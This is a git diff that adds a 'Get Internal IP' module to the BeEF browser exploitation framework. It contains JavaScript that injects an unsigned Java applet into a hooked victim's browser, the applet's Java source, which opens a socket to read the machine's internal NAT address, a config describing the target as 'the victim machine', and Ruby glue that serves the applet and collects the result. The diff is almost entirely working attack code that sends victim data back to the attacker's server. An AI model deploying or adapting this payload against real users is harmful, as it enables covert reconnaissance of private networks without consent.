diff --git a/modules/host/get_internal_ip/command.js b/modules/host/get_internal_ip/command.js new file mode 100755 index 000000000..abc000788 --- /dev/null +++ b/modules/host/get_internal_ip/command.js @@ -0,0 +1,42 @@ +// +// Copyright 2012 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + var applet_uri = 'http://'+beef.net.host+ ':' + beef.net.port + '/'; + var output; + beef.dom.attachApplet('get_internal_ip', 'get_internal_ip', 'get_internal_ip' , + applet_uri, null, null); + + function waituntilok() { + try { + output = document.get_internal_ip.ip(); + beef.net.send('<%= @command_url %>', <%= @command_id %>, output); + beef.dom.detachApplet('get_internal_ip'); + return; + } catch (e) { + internal_counter++; + if (internal_counter > timeout) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Timeout after '+timeout+' seconds'); + beef.dom.detachApplet('get_internal_ip'); + return; + } + setTimeout(function() {waituntilok()},1000); + } + } + + setTimeout(function() {waituntilok()},5000); + +}); diff --git a/modules/host/get_internal_ip/config.yaml b/modules/host/get_internal_ip/config.yaml new file mode 100755 index 000000000..68a4d63c3 --- /dev/null +++ b/modules/host/get_internal_ip/config.yaml @@ -0,0 +1,26 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + get_internal_ip: + enable: true + category: "Host" + name: "Get Internal IP" + description: "Retrieve the internal (behind NAT) IP address of the victim machine using an unsigned Java applet" + authors: ["antisnatchor"] + target: + working: ["IE", "FF", "O"] + user_notify: ["C", "S"] diff --git a/modules/host/get_internal_ip/get_internal_ip.class b/modules/host/get_internal_ip/get_internal_ip.class new file mode 100755 index 000000000..ee31c505b Binary files /dev/null and b/modules/host/get_internal_ip/get_internal_ip.class differ diff --git a/modules/host/get_internal_ip/get_internal_ip.java b/modules/host/get_internal_ip/get_internal_ip.java new file mode 100755 index 000000000..2882d1de1 --- /dev/null +++ b/modules/host/get_internal_ip/get_internal_ip.java @@ -0,0 +1,49 @@ +import java.applet.Applet; +import java.applet.AppletContext; +import java.net.InetAddress; +import java.net.Socket; + +/* to compiled it in MacOSX SnowLeopard/Lion: +* javac -cp /System/Library/Frameworks/JavaVM.framework/Resources/Deploy.bundle/Contents/Resources/Java/plugin.jar get_internal_ip.java +* author: antisnatchor (adapted from Lars Kindermann applet) +*/ +public class get_internal_ip extends Applet { + String Ip = "unknown"; + String internalIp = "unknown"; + String IpL = "unknown"; + + private String MyIP(boolean paramBoolean) { + Object obj = "unknown"; + String str2 = getDocumentBase().getHost(); + int i = 80; + if (getDocumentBase().getPort() != -1) i = getDocumentBase().getPort(); + try { + String str1 = new Socket(str2, i).getLocalAddress().getHostAddress(); + if (!str1.equals("255.255.255.255")) obj = str1; + } catch (SecurityException localSecurityException) { + obj = "FORBIDDEN"; + } catch (Exception localException1) { + obj = "ERROR"; + } + if (paramBoolean) try { + obj = new Socket(str2, i).getLocalAddress().getHostName(); + } catch (Exception localException2) { + } + return (String) obj; + } + + public void init() { + this.Ip = MyIP(false); + } + + public String ip() { + return this.Ip; + } + + public String internalIp() { + return this.internalIp; + } + + public void start() { + } +} \ No newline at end of file diff --git a/modules/host/get_internal_ip/module.rb b/modules/host/get_internal_ip/module.rb new file mode 100755 index 000000000..cb950806a --- /dev/null +++ b/modules/host/get_internal_ip/module.rb @@ -0,0 +1,35 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Get_internal_ip < BeEF::Core::Command + + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_internal_ip/get_internal_ip.class', '/get_internal_ip', 'class') + end + + #def self.options + # return [ + # { 'name' => 'applet_name', 'description' => 'Applet Name', 'ui_label'=>'Number', 'value' =>'5551234','width' => '200px' }, + # ] + #end + + def post_execute + content = {} + content['Result'] = @datastore['result'] + save content + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/get_internal_ip.class') + end + +end